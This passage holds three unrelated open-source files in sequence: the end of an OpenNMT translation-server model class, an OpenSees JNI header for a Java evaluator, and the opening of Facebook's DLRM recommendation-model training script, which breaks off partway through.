spm.SentencePieceProcessor() model_path = os.path.join(self.model_root, self.tokenizer_opt['model']) sp.Load(model_path) self.tokenizer = sp else: raise ValueError("Invalid value for tokenizer type") self.load_time = timer.tick() self.reset_unload_timer() def run(self, inputs): """Translate `inputs` using this model Args: inputs: [{"src": "..."},{"src": ...}] Returns: result: (list) translations times: (dict) containing times """ timer = Timer() print("\nRunning translation using %d" % self.model_id) timer.start() if not self.loaded: self.load() timer.tick(name="load") elif self.opt.cuda: self.to_gpu() timer.tick(name="to_gpu") # NOTE: the translator exept a filepath as parameter # therefore we write the data as a temp file. tmp_root = "/tmp/onmt_server" if not os.path.exists(tmp_root): os.makedirs(tmp_root) src_path = os.path.join(tmp_root, "tmp_src") with codecs.open(src_path, 'w', 'utf-8') as f: # NOTE: If an input contains an line separator \n we split it # into subsegments that we translate independantly # we then merge the translations together with the same # line breaks subsegment = {} sscount = 0 sslength = [] for (i, inp) in enumerate(inputs): src = inp['src'] lines = src.split("\n") subsegment[i] = slice(sscount, sscount + len(lines)) sscount += len(lines) for line in lines: tok = self.maybe_tokenize(line) f.write(tok + "\n") sslength += [len(tok.split())] timer.tick(name="writing") try: scores = self.translator.translate(None, src_path, None, self.opt.batch_size) except RuntimeError as e: raise ServerModelError("Runtime Error: %s" % str(e)) timer.tick(name="translation") print("""Using model #%d\t%d inputs (%d subsegment) \ttranslation time: %f""" % (self.model_id, len(subsegment), sscount, timer.times['translation'])) self.reset_unload_timer() results = self.out_file.getvalue().split("\n") print("Results: ", len(results)) results = ['\n'.join([self.maybe_detokenize(_) for _ in results[subsegment[i]] if len(_) > 0]) for i in sorted(subsegment.keys())] avg_scores = [sum([s * l for s, l in zip(scores[sub], sslength[sub])]) / sum(sslength[sub]) for k, sub in sorted(subsegment.items(), key=lambda x: x[0])] self.clear_out_file() return results, avg_scores, self.opt.n_best, timer.times def do_timeout(self): """Timeout function that free GPU memory by moving the model to CPU or unloading it; depending on `self.on_timemout` value """ if self.on_timeout == "unload": print("Timeout: unloading model %d" % self.model_id) self.unload() if self.on_timeout == "to_cpu": print("Timeout: sending model %d to CPU" % self.model_id) self.to_cpu() def unload(self): print("Unloading model %d" % self.model_id) del self.translator if self.opt.cuda: torch.cuda.empty_cache() self.unload_timer = None def reset_unload_timer(self): if self.timeout < 0: return if self.unload_timer is not None: self.unload_timer.cancel() self.unload_timer = threading.Timer(self.timeout, self.do_timeout) self.unload_timer.start() def to_dict(self): hide_opt = ["model", "src"] d = {"model_id": self.model_id, "opt": {k: self.user_opt[k] for k in self.user_opt.keys() if k not in hide_opt}, "model": self.user_opt["model"], "loaded": self.loaded, "timeout": self.timeout, } if self.tokenizer_opt is not None: d["tokenizer"] = self.tokenizer_opt return d def to_cpu(self): """Move the model to CPU and clear CUDA cache """ self.translator.model.cpu() if self.opt.cuda: torch.cuda.empty_cache() def to_gpu(self): """Move the model to GPU """ torch.cuda.set_device(self.opt.gpu) self.translator.model.cuda() def clear_out_file(self): # Creating a new object is faster self.out_file = io.StringIO() self.translator.out_file = self.out_file def maybe_tokenize(self, sequence): """Tokenize the sequence (or not) Same args/returns as `tokenize` """ if self.tokenizer_opt is not None: return self.tokenize(sequence) return sequence def tokenize(self, sequence): """Tokenize a single sequence Args: sequence: (str) the sequence to tokenize Returns: tok: (str) the tokenized sequence """ if self.tokenizer is None: raise ValueError("No tokenizer loaded") if self.tokenizer_opt["type"] == "sentencepiece": tok = self.tokenizer.EncodeAsPieces(sequence) tok = " ".join(tok) return tok def maybe_detokenize(self, sequence): """De-tokenize the sequence (or not) Same args/returns as `tokenize` """ if self.tokenizer_opt is not None: return self.detokenize(sequence) return sequence def detokenize(self, sequence): """Detokenize a single sequence Same args/returns as `tokenize` """ if self.tokenizer is None: raise ValueError("No tokenizer loaded") if self.tokenizer_opt["type"] == "sentencepiece": detok = self.tokenizer.DecodePieces(sequence.split()) return detok
{ "pile_set_name": "Github" }
/* ****************************************************************** ** ** OpenSees - Open System for Earthquake Engineering Simulation ** ** Pacific Earthquake Engineering Research Center ** ** ** ** ** ** (C) Copyright 1999, The Regents of the University of California ** ** All Rights Reserved. ** ** ** ** Commercial use of this program without express permission of the ** ** University of California, Berkeley, is strictly prohibited. See ** ** file 'COPYRIGHT' in main directory for information on usage and ** ** redistribution, and for a DISCLAIMER OF ALL WARRANTIES. ** ** ** ** Developed by: ** ** Frank McKenna (fmckenna@ce.berkeley.edu) ** ** Gregory L. Fenves (fenves@ce.berkeley.edu) ** ** ** ** ****************************************************************** */ // $Revision: 1.1 $ // $Date: 2007-04-06 03:43:53 $ // $Source: /usr/local/cvs/OpenSees/SRC/java/OpenSeesEvaluator.h,v $ // // Written: fmk // Created: 07/04 // #include <jni.h> /* Header for class OpenSeesEvaluator */ #ifndef _Included_OpenSeesEvaluator #define _Included_OpenSeesEvaluator #ifdef __cplusplus extern "C" { #endif /* * Class: OpenSeesEvaluator * Method: openSeesInit * Signature: ()I */ JNIEXPORT jint JNICALL Java_OpenSeesEvaluator_openSeesInit (JNIEnv *, jobject); /* * Class: OpenSeesEvaluator * Method: openSeesEval * Signature: (Ljava/lang/String;I)Ljava/lang/String; */ JNIEXPORT jstring JNICALL Java_OpenSeesEvaluator_openSeesEval (JNIEnv *, jobject, jstring, jint); /* * Class: OpenSeesEvaluator * Method: openSeesQuit * Signature: ()I */ JNIEXPORT jint JNICALL Java_OpenSeesEvaluator_openSeesQuit (JNIEnv *, jobject); #ifdef __cplusplus } #endif #endif
{ "pile_set_name": "Github" }
# Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. # # Description: an implementation of a deep learning recommendation model (DLRM) # The model input consists of dense and sparse features. The former is a vector # of floating point values. The latter is a list of sparse indices into # embedding tables, which consist of vectors of floating point values. # The selected vectors are passed to mlp networks denoted by triangles, # in some cases the vectors are interacted through operators (Ops). # # output: # vector of values # model: | # /\ # /__\ # | # _____________________> Op <___________________ # / | \ # /\ /\ /\ # /__\ /__\ ... /__\ # | | | # | Op Op # | ____/__\_____ ____/__\____ # | |_Emb_|____|__| ... |_Emb_|__|___| # input: # [ dense features ] [sparse indices] , ..., [sparse indices] # # More precise definition of model layers: # 1) fully connected layers of an mlp # z = f(y) # y = Wx + b # # 2) embedding lookup (for a list of sparse indices p=[p1,...,pk]) # z = Op(e1,...,ek) # obtain vectors e1=E[:,p1], ..., ek=E[:,pk] # # 3) Operator Op can be one of the following # Sum(e1,...,ek) = e1 + ... + ek # Dot(e1,...,ek) = [e1'e1, ..., e1'ek, ..., ek'e1, ..., ek'ek] # Cat(e1,...,ek) = [e1', ..., ek']' # where ' denotes transpose operation # # References: # [1] Maxim Naumov, Dheevatsa Mudigere, Hao-Jun Michael Shi, Jianyu Huang, # Narayanan Sundaram, Jongsoo Park, Xiaodong Wang, Udit Gupta, Carole-Jean Wu, # Alisson G. Azzolini, Dmytro Dzhulgakov, Andrey Mallevich, Ilia Cherniavskii, # Yinghai Lu, Raghuraman Krishnamoorthi, Ansha Yu, Volodymyr Kondratenko, # Stephanie Pereira, Xianjie Chen, Wenlin Chen, Vijay Rao, Bill Jia, Liang Xiong, # Misha Smelyanskiy, "Deep Learning Recommendation Model for Personalization and # Recommendation Systems", CoRR, arXiv:1906.00091, 2019 from __future__ import absolute_import, division, print_function, unicode_literals # miscellaneous import builtins import functools # import bisect # import shutil import time import json # data generation from . import dlrm_data_pytorch as dp # numpy import numpy as np # onnx # The onnx import causes deprecation warnings every time workers # are spawned during testing. So, we filter out those warnings. import warnings with warnings.catch_warnings(): warnings.filterwarnings("ignore", category=DeprecationWarning) import onnx # pytorch import torch import torch.nn as nn from torch.nn.parallel.parallel_apply import parallel_apply from torch.nn.parallel.replicate import replicate from torch.nn.parallel.scatter_gather import gather, scatter # quotient-remainder trick from .tricks.qr_embedding_bag import QREmbeddingBag # mixed-dimension trick from .tricks.md_embedding_bag import PrEmbeddingBag, md_solver import sklearn.metrics # from torchviz import make_dot # import torch.nn.functional as Functional # from torch.nn.parameter import Parameter from torch.optim.lr_scheduler import _LRScheduler exc = getattr(builtins, "IOError", "FileNotFoundError") class LRPolicyScheduler(_LRScheduler): def __init__(self, optimizer, num_warmup_steps, decay_start_step, num_decay_steps): self.num_warmup_steps = num_warmup_steps self.decay_start_step = decay_start_step self.decay_end_step = decay_start_step + num_decay_steps self.num_decay_steps = num_decay_steps if self.decay_start_step < self.num_warmup_steps: sys.exit("Learning rate warmup must finish before the decay starts") super(LRPolicyScheduler, self).__init__(optimizer) def get_lr(self): step_count = self._step_count if step_count < self.num_warmup_steps: # warmup scale = 1.0 - (self.num_warmup_steps - step_count) / self.num_warmup_steps lr = [base_lr * scale for base_lr in self.base_lrs] self.last_lr = lr elif self.decay_start_step <= step_count and step_count < self.decay_end_step: # decay decayed_steps = step_count - self.decay_start_step scale = ((self.num_decay_steps - decayed_steps) / self.num_decay_steps) ** 2 min_lr = 0.0000001 lr = [max(min_lr, base_lr * scale) for base_lr in self.base_lrs] self.last_lr = lr else: if self.num_decay_steps > 0: # freeze at last, either because we're after decay # or because we're between warmup and decay lr = self.last_lr else: # do not adjust lr = self.base_lrs return lr ### define dlrm in PyTorch ### class DLRM_Net(nn.Module): def create_mlp(self, ln, sigmoid_layer): # build MLP layer by layer layers = nn.ModuleList() for i in range(0, ln.size - 1): n = ln[i] m = ln[i + 1] # construct fully connected operator LL = nn.Linear(int(n), int(m), bias=True) # initialize the weights # with torch.no_grad(): # custom Xavier input, output or two-sided fill mean = 0.0 # std_dev = np.sqrt(variance) std_dev = np.sqrt(2 / (m + n)) # np.sqrt(1 / m) # np.sqrt(1 / n) W = np.random.normal(mean, std_dev, size=(m, n)).astype(np.float32) std_dev = np.sqrt(1 / m) # np.sqrt(2 / (m + 1)) bt = np.random.normal(mean, std_dev, size=m).astype(np.float32) # approach 1 LL.weight.data = torch.tensor(W, requires_grad=True) LL.bias.data = torch.tensor(bt, requires_grad=True) # approach 2 # LL.weight.data.copy_(torch.tensor(W)) # LL.bias.data.copy_(torch.tensor(bt)) # approach 3 # LL.weight = Parameter(torch.tensor(W),requires_grad=True) # LL.bias = Parameter(torch.tensor(bt),requires_grad=True) layers.append(LL) # construct sigmoid or relu operator if i == sigmoid_layer: layers.append(nn.Sigmoid()) else: layers.append(nn.ReLU()) # approach 1: use ModuleList # return layers # approach 2: use Sequential container to wrap all layers return torch.nn.Sequential(*layers) def create_emb(self, m, ln): emb_l = nn.ModuleList() for i in range(0, ln.size): n = ln[i] # construct embedding operator if self.qr_flag and n > self.qr_threshold: EE = QREmbeddingBag(n, m, self.qr_collisions, operation=self.qr_operation, mode="sum", sparse=True) elif self.md_flag: base = max(m) _m = m[i] if n > self.md_threshold else base EE = PrEmbeddingBag(n, _m, base) # use np initialization as below for consistency... W = np.random.uniform( low=-np.sqrt(1 / n), high=np.sqrt(1 / n), size=(n, _m) ).astype(np.float32) EE.embs.weight.data = torch.tensor(W, requires_grad=True) else: EE = nn.EmbeddingBag(n, m, mode="sum", sparse=True) # initialize embeddings # nn.init.uniform_(EE.weight, a=-np.sqrt(1 / n), b=np.sqrt(1 / n)) W = np.random.uniform( low=-np.sqrt(1 / n), high=np.sqrt(1 / n), size=(n, m) ).astype(np.float32) # approach 1 EE.weight.data = torch.tensor(W, requires_grad=True) # approach 2 # EE.weight.data.copy_(torch.tensor(W)) # approach 3 # EE.weight = Parameter(torch.tensor(W),requires_grad=True) emb_l.append(EE) return emb_l def __init__( self, m_spa=None, ln_emb=None, ln_bot=None, ln_top=None, arch_interaction_op=None, arch_interaction_itself=False, sigmoid_bot=-1, sigmoid_top=-1, sync_dense_params=True, loss_threshold=0.0, ndevices=-1, qr_flag=False, qr_operation="mult", qr_collisions=0, qr_threshold=200, md_flag=False, md_threshold=200, ): super(DLRM_Net, self).__init__() if ( (m_spa is not None) and (ln_emb is not None) and (ln_bot is not None) and (ln_top is not None) and (arch_interaction_op is not None) ): # save arguments self.ndevices = ndevices self.output_d = 0 self.parallel_model_batch_size = -1 self.parallel_model_is_not_prepared = True self.arch_interaction_op = arch_interaction_op self.arch_interaction_itself = arch_interaction_itself self.sync_dense_params = sync_dense_params self.loss_threshold = loss_threshold # create variables for QR embedding if applicable self.qr_flag = qr_flag if self.qr_flag: self.qr_collisions = qr_collisions self.qr_operation = qr_operation self.qr_threshold = qr_threshold # create variables for MD embedding if applicable self.md_flag = md_flag if self.md_flag: self.md_threshold = md_threshold # create operators if ndevices <= 1: self.emb_l = self.create_emb(m_spa, ln_emb) self.bot_l = self.create_mlp(ln_bot, sigmoid_bot) self.top_l = self.create_mlp(ln_top, sigmoid_top) def apply_mlp(self, x, layers): # approach 1: use ModuleList # for layer in layers: # x = layer(x) # return x # approach 2: use Sequential container to wrap all layers return layers(x) def apply_emb(self, lS_o, lS_i, emb_l): # WARNING: notice that we are processing the batch at once. We implicitly # assume that the data is laid out such that: # 1. each embedding is indexed with a group of sparse indices, # corresponding to a single lookup # 2. for each embedding the lookups are further organized into a batch # 3. for a list of embedding tables there is a list of batched lookups ly = [] # for k, sparse_index_group_batch in enumerate(lS_i): for k in range(len(lS_i)): sparse_index_group_batch = lS_i[k] sparse_offset_group_batch = lS_o[k] # embedding lookup # We are using EmbeddingBag, which implicitly uses sum operator. # The embeddings are represented as tall matrices, with sum # happening vertically across 0 axis, resulting in a row vector E = emb_l[k] V = E(sparse_index_group_batch, sparse_offset_group_batch) ly.append(V) # print(ly) return ly def interact_features(self, x, ly): if self.arch_interaction_op == "dot": # concatenate dense and sparse features (batch_size, d) = x.shape T = torch.cat([x] + ly, dim=1).view((batch_size, -1, d)) # perform a dot product Z = torch.bmm(T, torch.transpose(T, 1, 2)) # append dense feature with the interactions (into a row vector) # approach 1: all # Zflat = Z.view((batch_size, -1)) # approach 2: unique _, ni, nj = Z.shape # approach 1: tril_indices # offset = 0 if self.arch_interaction_itself else -1 # li, lj = torch.tril_indices(ni, nj, offset=offset) # approach 2: custom offset = 1 if self.arch_interaction_itself else 0 li = torch.tensor([i for i in range(ni) for j in range(i + offset)]) lj = torch.tensor([j for i in range(nj) for j in range(i + offset)]) Zflat = Z[:, li, lj] # concatenate dense features and interactions R = torch.cat([x] + [Zflat], dim=1) elif self.arch_interaction_op == "cat": # concatenation features (into a row vector) R = torch.cat([x] + ly, dim=1) else: sys.exit( "ERROR: --arch-interaction-op=" + self.arch_interaction_op + " is not supported" ) return R def forward(self, dense_x, lS_o, lS_i): if self.ndevices <= 1: return self.sequential_forward(dense_x, lS_o, lS_i) else: return self.parallel_forward(dense_x, lS_o, lS_i) def sequential_forward(self, dense_x, lS_o, lS_i): # process dense features (using bottom mlp), resulting in a row vector x = self.apply_mlp(dense_x, self.bot_l) # debug prints # print("intermediate") # print(x.detach().cpu().numpy()) # process sparse features(using embeddings), resulting in a list of row vectors ly = self.apply_emb(lS_o, lS_i, self.emb_l) # for y in ly: # print(y.detach().cpu().numpy()) # interact features (dense and sparse) z = self.interact_features(x, ly) # print(z.detach().cpu().numpy()) # obtain probability of a click (using top mlp) p = self.apply_mlp(z, self.top_l) # clamp output if needed if 0.0 < self.loss_threshold and self.loss_threshold < 1.0: z = torch.clamp(p, min=self.loss_threshold, max=(1.0 - self.loss_threshold)) else: z = p return z def parallel_forward(self, dense_x, lS_o, lS_i): ### prepare model (overwrite) ### # WARNING: # of devices must be >= batch size in parallel_forward call batch_size = dense_x.size()[0] ndevices = min(self.ndevices, batch_size, len(self.emb_l)) device_ids = range(ndevices) # WARNING: must redistribute the model if mini-batch size changes(this is common # for last mini-batch, when # of elements in the dataset/batch size is not even if self.parallel_model_batch_size != batch_size: self.parallel_model_is_not_prepared = True if self.parallel_model_is_not_prepared or self.sync_dense_params: # replicate mlp (data parallelism) self.bot_l_replicas = replicate(self.bot_l, device_ids) self.top_l_replicas = replicate(self.top_l, device_ids) self.parallel_model_batch_size = batch_size if self.parallel_model_is_not_prepared: # distribute embeddings (model parallelism) t_list = [] for k, emb in enumerate(self.emb_l): d = torch.device("cuda:" + str(k % ndevices)) emb.to(d) t_list.append(emb.to(d)) self.emb_l = nn.ModuleList(t_list) self.parallel_model_is_not_prepared = False ### prepare input (overwrite) ### # scatter dense features (data parallelism) # print(dense_x.device) dense_x = scatter(dense_x, device_ids, dim=0) # distribute sparse features (model parallelism) if (len(self.emb_l) != len(lS_o)) or (len(self.emb_l) != len(lS_i)): sys.exit("ERROR: corrupted model input detected in parallel_forward call") t_list = [] i_list = [] for k, _ in enumerate(self.emb_l): d = torch.device("cuda:" + str(k % ndevices)) t_list.append(lS_o[k].to(d)) i_list.append(lS_i[k].to(d)) lS_o = t_list lS_i = i_list ### compute results in parallel ### # bottom mlp # WARNING: Note that the self.bot_l is a list of bottom mlp modules # that have been replicated across devices, while dense_x is a tuple of dense # inputs that has been scattered across devices on the first (batch) dimension. # The output is a list of tensors scattered across devices according to the # distribution of dense_x. x = parallel_apply(self.bot_l_replicas, dense_x, None, device_ids) # debug prints # print(x) # embeddings ly = self.apply_emb(lS_o, lS_i, self.emb_l) # debug prints # print(ly) # butterfly shuffle (implemented inefficiently for now) # WARNING: Note that at this point we have the result of the embedding lookup # for the entire batch on each device. We would like to obtain partial results # corresponding to all embedding lookups, but part of the batch on each device. # Therefore, matching the distribution of output of bottom mlp, so that both # could be used for subsequent interactions on each device. if len(self.emb_l) != len(ly): sys.exit("ERROR: corrupted intermediate result in parallel_forward call") t_list = [] for k, _ in enumerate(self.emb_l): d = torch.device("cuda:" + str(k % ndevices)) y = scatter(ly[k], device_ids, dim=0) t_list.append(y) # adjust the list to be ordered per device ly = list(map(lambda y: list(y), zip(*t_list))) # debug prints # print(ly) # interactions z = [] for k in range(ndevices): zk = self.interact_features(x[k], ly[k]) z.append(zk) # debug prints # print(z) # top mlp # WARNING: Note that the self.top_l is a list of top mlp modules that # have been replicated across devices, while z is a list of interaction results # that by construction are scattered across devices on the first (batch) dim. # The output is a list of tensors scattered across devices according to the # distribution of z. p = parallel_apply(self.top_l_replicas, z, None, device_ids) ### gather the distributed results ### p0 = gather(p, self.output_d, dim=0) # clamp output if needed if 0.0 < self.loss_threshold and self.loss_threshold < 1.0: z0 = torch.clamp( p0, min=self.loss_threshold, max=(1.0 - self.loss_threshold) ) else: z0 = p0 return z0 def dash_separated_ints(value): vals = value.split('-') for val in vals: try: int(val) except ValueError: raise argparse.ArgumentTypeError( "%s is not a valid dash separated list of ints" % value) return value def dash_separated_floats(value): vals = value.split('-') for val in vals: try: float(val) except ValueError: raise argparse.ArgumentTypeError( "%s is not a valid dash separated list of floats" % value) return value if __name__ == "__main__": ### import packages ### import sys import argparse ### parse arguments ### parser = argparse.ArgumentParser( description="Train Deep Learning Recommendation Model (DLRM)" ) # model related parameters parser.add_argument("--arch-sparse-feature-size", type=int, default=2) parser.add_argument( "--arch-embedding-size", type=dash_separated_ints, default="4-3-2") # j will be replaced with the table number parser.add_argument( "--arch-mlp-bot", type=dash_separated_ints, default="4-3-2") parser.add_argument( "--arch-mlp-top", type=dash_separated_ints, default="4-2-1") parser.add_argument( "--arch-interaction-op", type=str, choices=['dot', 'cat'], default="dot") parser.add_argument("--arch-interaction-itself", action="store_true", default=False) # embedding table options parser.add_argument("--md-flag", action="store_true", default=False) parser.add_argument("--md-threshold", type=int, default=200) parser.add_argument("--md-temperature", type=float, default=0.3) parser.add_argument("--md-round-dims", action="store_true", default=False) parser.add_argument("--qr-flag", action="store_true", default=False) parser.add_argument("--qr-threshold", type=int, default=200) parser.add_argument("--qr-operation", type=str, default="mult") parser.add_argument("--qr-collisions", type=int, default=4) # activations and loss parser.add_argument("--activation-function", type=str, default="relu") parser.add_argument("--loss-function", type=str, default="mse") # or bce or wbce parser.add_argument( "--loss-weights", type=dash_separated_floats, default="1.0-1.0") # for wbce parser.add_argument("--loss-threshold", type=float, default=0.0) # 1.0e-7 parser.add_argument("--round-targets", type=bool, default=False) # data parser.add_argument("--data-size", type=int, default=1) parser.add_argument("--num-batches", type=int, default=0) parser.add_argument( "--data-generation", type=str, default="random" ) # synthetic or dataset parser.add_argument("--data-trace-file", type=str, default="./input/dist_emb_j.log") parser.add_argument("--data-set", type=str, default="kaggle") # or terabyte parser.add_argument("--raw-data-file", type=str, default="") parser.add_argument("--processed-data-file", type=str, default="") parser.add_argument("--data-randomize", type=str, default="total") # or day or none parser.add_argument("--data-trace-enable-padding", type=bool, default=False) parser.add_argument("--max-ind-range", type=int, default=-1) parser.add_argument("--data-sub-sample-rate", type=float, default=0.0) # in [0, 1] parser.add_argument("--num-indices-per-lookup", type=int, default=10) parser.add_argument("--num-indices-per-lookup-fixed", type=bool, default=False) parser.add_argument("--num-workers", type=int, default=0) parser.add_argument("--memory-map", action="store_true", default=False) # training parser.add_argument("--mini-batch-size", type=int, default=1) parser.add_argument("--nepochs", type=int, default=1) parser.add_argument("--learning-rate", type=float, default=0.01) parser.add_argument("--print-precision", type=int, default=5) parser.add_argument("--numpy-rand-seed", type=int, default=123) parser.add_argument("--sync-dense-params", type=bool, default=True) # inference parser.add_argument("--inference-only", action="store_true", default=False) # onnx parser.add_argument("--save-onnx", action="store_true", default=False) # gpu parser.add_argument("--use-gpu", action="store_true", default=False) # debugging and profiling parser.add_argument("--print-freq", type=int, default=1) parser.add_argument("--test-freq", type=int, default=-1) parser.add_argument("--test-mini-batch-size", type=int, default=-1) parser.add_argument("--test-num-workers", type=int, default=-1) parser.add_argument("--print-time", action="store_true", default=False) parser.add_argument("--debug-mode", action="store_true", default=False) parser.add_argument("--enable-profiling", action="store_true", default=False) parser.add_argument("--plot-compute-graph", action="store_true", default=False) # store/load model parser.add_argument("--save-model", type=str, default="") parser.add_argument("--load-model", type=str, default="") # mlperf logging (disables other output and stops early) parser.add_argument("--mlperf-logging", action="store_true", default=False) # stop at target accuracy Kaggle 0.789, Terabyte (sub-sampled=0.875) 0.8107 parser.add_argument("--mlperf-acc-threshold", type=float, default=0.0) # stop at target AUC Terabyte (no subsampling) 0.8025 parser.add_argument("--mlperf-auc-threshold", type=float, default=0.0) parser.add_argument("--mlperf-bin-loader", action='store_true', default=False) parser.add_argument("--mlperf-bin-shuffle", action='store_true', default=False) # LR policy parser.add_argument("--lr-num-warmup-steps", type=int, default=0) parser.add_argument("--lr-decay-start-step", type=int, default=0) parser.add_argument("--lr-num-decay-steps", type=int, default=0) args = parser.parse_args() if args.mlperf_logging: print('command line args: ', json.dumps(vars(args))) ### some basic setup ### np.random.seed(args.numpy_rand_seed) np.set_printoptions(precision=args.print_precision) torch.set_printoptions(precision=args.print_precision) torch.manual_seed(args.numpy_rand_seed) if (args.test_mini_batch_size < 0): # if the parameter is not set, use the training batch size args.test_mini_batch_size = args.mini_batch_size if (args.test_num_workers < 0): # if the parameter is not set, use the same parameter for training args.test_num_workers = args.num_workers use_gpu = args.use_gpu and torch.cuda.is_available() if use_gpu: torch.cuda.manual_seed_all(args.numpy_rand_seed) torch.backends.cudnn.deterministic = True device = torch.device("cuda", 0) ngpus = torch.cuda.device_count() # 1 print("Using {} GPU(s)...".format(ngpus)) else: device = torch.device("cpu") print("Using CPU...") ### prepare training data ### ln_bot = np.fromstring(args.arch_mlp_bot, dtype=int, sep="-") # input data if (args.data_generation == "dataset"): train_data, train_ld, test_data, test_ld = \ dp.make_criteo_data_and_loaders(args) nbatches = args.num_batches if args.num_batches > 0 else len(train_ld) nbatches_test = len(test_ld) ln_emb = train_data.counts # enforce maximum limit on number of vectors per embedding if args.max_ind_range > 0: ln_emb = np.array(list(map( lambda x: x if x < args.max_ind_range else args.max_ind_range, ln_emb ))) m_den = train_data.m_den ln_bot[0] = m_den else: # input and target at random ln_emb = np.fromstring(args.arch_embedding_size, dtype=int, sep="-") m_den = ln_bot[0] train_data, train_ld = dp.make_random_data_and_loader(args, ln_emb, m_den) nbatches = args.num_batches if args.num_batches > 0 else len(train_ld) ### parse command line arguments ### m_spa = args.arch_sparse_feature_size num_fea = ln_emb.size + 1 # num sparse + num dense features m_den_out = ln_bot[ln_bot.size - 1] if args.arch_interaction_op == "dot": # approach 1: all # num_int = num_fea * num_fea + m_den_out # approach 2: unique if args.arch_interaction_itself: num_int = (num_fea * (num_fea + 1)) // 2 + m_den_out else: num_int = (num_fea * (num_fea - 1)) // 2 + m_den_out elif args.arch_interaction_op == "cat": num_int = num_fea * m_den_out else: sys.exit( "ERROR: --arch-interaction-op=" + args.arch_interaction_op + " is not supported" ) arch_mlp_top_adjusted = str(num_int) + "-" + args.arch_mlp_top ln_top = np.fromstring(arch_mlp_top_adjusted, dtype=int, sep="-") # sanity check: feature sizes and mlp dimensions must match if m_den != ln_bot[0]: sys.exit( "ERROR: arch-dense-feature-size " + str(m_den) + " does not match first dim of bottom mlp " + str(ln_bot[0]) ) if args.qr_flag: if args.qr_operation == "concat" and 2 * m_spa != m_den_out: sys.exit( "ERROR: 2 arch-sparse-feature-size " + str(2 * m_spa) + " does not match last dim of bottom mlp " + str(m_den_out) + " (note that the last dim of bottom mlp must be 2x the embedding dim)" ) if args.qr_operation != "concat" and m_spa != m_den_out: sys.exit( "ERROR: arch-sparse-feature-size " + str(m_spa) + " does not match last dim of bottom mlp " + str(m_den_out) ) else: if m_spa != m_den_out: sys.exit( "ERROR: arch-sparse-feature-size " + str(m_spa) + " does not match last dim of bottom mlp " + str(m_den_out) ) if num_int != ln_top[0]: sys.exit( "ERROR: # of feature interactions " + str(num_int) + " does not match first dimension of top mlp " + str(ln_top[0]) ) # assign mixed dimensions if applicable if args.md_flag: m_spa = md_solver( torch.tensor(ln_emb), args.md_temperature, # alpha d0=m_spa, round_dim=args.md_round_dims ).tolist() # test prints (model arch) if args.debug_mode: print("model arch:") print( "mlp top arch " + str(ln_top.size - 1) + " layers, with input to output dimensions:" ) print(ln_top) print("# of interactions") print(num_int) print( "mlp bot arch " + str(ln_bot.size - 1) + " layers, with input to output dimensions:" ) print(ln_bot) print("# of features (sparse and dense)") print(num_fea) print("dense feature size") print(m_den) print("sparse feature size") print(m_spa) print( "# of embeddings (= # of sparse features) " + str(ln_emb.size) + ", with dimensions " + str(m_spa) + "x:" ) print(ln_emb) print("data (inputs and targets):") for j, (X, lS_o, lS_i, T) in enumerate(train_ld): # early exit if nbatches was set by the user and has been exceeded if nbatches > 0 and j >= nbatches: break print("mini-batch: %d" % j) print(X.detach().cpu().numpy()) # transform offsets to lengths when printing print( [ np.diff( S_o.detach().cpu().tolist() + list(lS_i[i].shape) ).tolist() for i, S_o in enumerate(lS_o) ] ) print([S_i.detach().cpu().tolist() for S_i in lS_i]) print(T.detach().cpu().numpy()) ndevices = min(ngpus, args.mini_batch_size, num_fea - 1) if use_gpu else -1 ### construct the neural network specified above ### # WARNING: to obtain exactly the same initialization for # the weights we need to start from the same random seed. # np.random.seed(args.numpy_rand_seed) dlrm = DLRM_Net( m_spa, ln_emb, ln_bot, ln_top, arch_interaction_op=args.arch_interaction_op, arch_interaction_itself=args.arch_interaction_itself, sigmoid_bot=-1, sigmoid_top=ln_top.size - 2, sync_dense_params=args.sync_dense_params, loss_threshold=args.loss_threshold, ndevices=ndevices, qr_flag=args.qr_flag, qr_operation=args.qr_operation, qr_collisions=args.qr_collisions, qr_threshold=args.qr_threshold, md_flag=args.md_flag, md_threshold=args.md_threshold, ) # test prints if args.debug_mode: print("initial parameters (weights and bias):") for param in dlrm.parameters(): print(param.detach().cpu().numpy()) # print(dlrm) if use_gpu: # Custom Model-Data Parallel # the mlps are replicated and use data parallelism, while # the embeddings are distributed and use model parallelism dlrm = dlrm.to(device) # .cuda() if dlrm.ndevices > 1: dlrm.emb_l = dlrm.create_emb(m_spa, ln_emb) # specify the loss function if args.loss_function == "mse": loss_fn = torch.nn.MSELoss(reduction="mean") elif args.loss_function == "bce": loss_fn = torch.nn.BCELoss(reduction="mean") elif args.loss_function == "wbce": loss_ws = torch.tensor(np.fromstring(args.loss_weights, dtype=float, sep="-")) loss_fn = torch.nn.BCELoss(reduction="none") else: sys.exit("ERROR: --loss-function=" + args.loss_function + " is not supported") if not args.inference_only: # specify the optimizer algorithm optimizer = torch.optim.SGD(dlrm.parameters(), lr=args.learning_rate) lr_scheduler = LRPolicyScheduler(optimizer, args.lr_num_warmup_steps, args.lr_decay_start_step, args.lr_num_decay_steps) ### main loop ### def time_wrap(use_gpu): if use_gpu: torch.cuda.synchronize() return time.time() def dlrm_wrap(X, lS_o, lS_i, use_gpu, device): if use_gpu: # .cuda() # lS_i can be either a list of tensors or a stacked tensor. # Handle each case below: lS_i = [S_i.to(device) for S_i in lS_i] if isinstance(lS_i, list) \ else lS_i.to(device) lS_o = [S_o.to(device) for S_o in lS_o] if isinstance(lS_o, list) \ else lS_o.to(device) return dlrm( X.to(device), lS_o, lS_i ) else: return dlrm(X, lS_o, lS_i) def loss_fn_wrap(Z, T, use_gpu, device): if args.loss_function == "mse" or args.loss_function == "bce": if use_gpu: return loss_fn(Z, T.to(device)) else: return loss_fn(Z, T) elif args.loss_function == "wbce": if use_gpu: loss_ws_ = loss_ws[T.data.view(-1).long()].view_as(T).to(device) loss_fn_ = loss_fn(Z, T.to(device)) else: loss_ws_ = loss_ws[T.data.view(-1).long()].view_as(T) loss_fn_ = loss_fn(Z, T.to(device)) loss_sc_ = loss_ws_ * loss_fn_ # debug prints # print(loss_ws_) # print(loss_fn_) return loss_sc_.mean() # training or inference best_gA_test = 0 best_auc_test = 0 skip_upto_epoch = 0 skip_upto_batch = 0 total_time = 0 total_loss = 0 total_accu = 0 total_iter = 0 total_samp = 0 k = 0 # Load model is specified if not (args.load_model == ""): print("Loading saved model {}".format(args.load_model)) if use_gpu: if dlrm.ndevices > 1: # NOTE: when targeting inference on multiple GPUs, # load the model as is on CPU or GPU, with the move # to multiple GPUs to 